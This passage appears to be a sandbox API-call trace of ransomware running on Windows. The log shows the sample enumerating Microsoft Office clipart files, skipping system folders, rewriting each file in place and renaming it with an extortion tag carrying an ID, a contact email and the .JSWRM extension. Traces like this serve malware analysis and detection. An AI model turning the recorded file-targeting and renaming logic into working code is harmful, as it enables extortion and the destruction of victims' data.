HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.918] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3986) returned 1 [0074.918] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf90) returned 0x24c1d0 [0074.918] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xf90, lpOverlapped=0x0) returned 1 [0074.920] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.920] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xf90, lpOverlapped=0x0) returned 1 [0074.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.920] CloseHandle (hObject=0x460) returned 1 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0074.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0074.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0074.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0074.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0074.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.921] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f86, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00195_.WMF", cAlternateFileName="")) returned 1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2=".") returned 1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="..") returned 1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="...") returned 1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="windows") returned -1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="recovery") returned -1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="perflogs") returned -1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="documents and settings") returned -1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="system volume information") returned -1 [0074.921] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="msocache") returned -1 [0074.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00195_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00195_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00195_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0074.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00195_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00195_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00195_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0074.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.925] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8070) returned 1 [0074.925] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f80) returned 0x24c1d0 [0074.925] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1f80, lpOverlapped=0x0) returned 1 [0074.927] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.927] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1f80, lpOverlapped=0x0) returned 1 [0074.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.927] CloseHandle (hObject=0x460) returned 1 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0074.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0074.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0074.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.928] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00234_.WMF", cAlternateFileName="")) returned 1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2=".") returned 1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="..") returned 1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="...") returned 1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="windows") returned -1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="recovery") returned -1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="perflogs") returned -1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="documents and settings") returned -1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="system volume information") returned -1 [0074.928] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="msocache") returned -1 [0074.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0074.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0074.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.929] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9304) returned 1 [0074.929] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2450) returned 0x24c1d0 [0074.929] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2450, lpOverlapped=0x0) returned 1 [0074.931] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.931] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2450, lpOverlapped=0x0) returned 1 [0074.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.931] CloseHandle (hObject=0x460) returned 1 [0074.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0074.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0074.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0074.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.932] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd5c704c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00242_.WMF", cAlternateFileName="")) returned 1 [0074.932] lstrcmpiW (lpString1="BL00242_.WMF", lpString2=".") returned 1 [0074.932] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="..") returned 1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="...") returned 1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="windows") returned -1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="recovery") returned -1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="perflogs") returned -1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="documents and settings") returned -1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="system volume information") returned -1 [0074.933] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="msocache") returned -1 [0074.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00242_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00242_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00242_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00242_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.933] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4024) returned 1 [0074.933] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfb0) returned 0x24c1d0 [0074.933] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xfb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xfb0, lpOverlapped=0x0) returned 1 [0074.935] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.935] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xfb0, 